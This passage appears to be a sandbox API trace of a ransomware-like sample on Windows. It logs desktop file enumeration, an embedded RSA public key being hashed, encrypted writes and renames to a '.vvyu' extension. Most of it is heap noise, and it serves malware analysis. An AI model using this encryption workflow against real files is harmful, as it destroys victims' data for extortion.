(HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af1990 [0188.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1778 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1990 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0188.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae20b0 | out: hHeap=0x2c0000) returned 1 [0188.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1568 | out: hHeap=0x2c0000) returned 1 [0188.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.113] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0xd6bf, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0xd6bf, lpOverlapped=0x0) returned 1 [0188.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.114] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd6c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.114] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.115] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.116] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.116] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.116] CloseHandle (hObject=0x584) returned 1 [0188.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2ae3ea0 [0188.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.118] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\9Ouhy.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\9ouhy.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\9Ouhy.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\9ouhy.mp3.vvyu")) returned 1 [0188.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.121] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.124] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5009dff0, ftCreationTime.dwHighDateTime=0x1d8a46b, ftLastAccessTime.dwLowDateTime=0xe2c461e0, ftLastAccessTime.dwHighDateTime=0x1d8a613, ftLastWriteTime.dwLowDateTime=0xe2c461e0, ftLastWriteTime.dwHighDateTime=0x1d8a613, nFileSizeHigh=0x0, nFileSizeLow=0x4171, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A85pj5GgBuiXXfuVCW4.ppt", cAlternateFileName="A85PJ5~1.PPT")) returned 1 [0188.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20b0 [0188.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0188.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae20b0 | out: hHeap=0x2c0000) returned 1 [0188.124] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\A85pj5GgBuiXXfuVCW4.ppt") returned=".ppt" [0188.124] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\A85pj5GgBuiXXfuVCW4.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\a85pj5ggbuixxfuvcw4.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.125] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=16753) returned 1 [0188.125] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.128] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x414b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.128] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.139] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.139] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x4171, lpOverlapped=0x0) returned 1 [0188.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.140] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.141] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.141] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.141] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.141] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.141] GetLastError () returned 0x0 [0188.141] SetLastError (dwErrCode=0x0) [0188.141] GetLastError () returned 0x0 [0188.141] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.142] GetLastError () returned 0x0 [0188.142] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.143] GetLastError () returned 0x0 [0188.143] SetLastError (dwErrCode=0x0) [0188.144] GetLastError () returned 0x0 [0188.144] SetLastError (dwErrCode=0x0) [0188.144] GetLastError () returned 0x0 [0188.144] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.144] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.144] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.144] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.144] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4170) returned 0x2ae3ea0 [0188.145] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20b0 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2068 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.145] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae8018 [0188.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae8238 [0188.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8238 | out: hHeap=0x2c0000) returned 1 [0188.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d850 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d838 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8018 | out: hHeap=0x2c0000) returned 1 [0188.148] GetCurrentThreadId () returned 0x5d8 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee0b0 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.149] GetCurrentThreadId () returned 0x5d8 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.152] 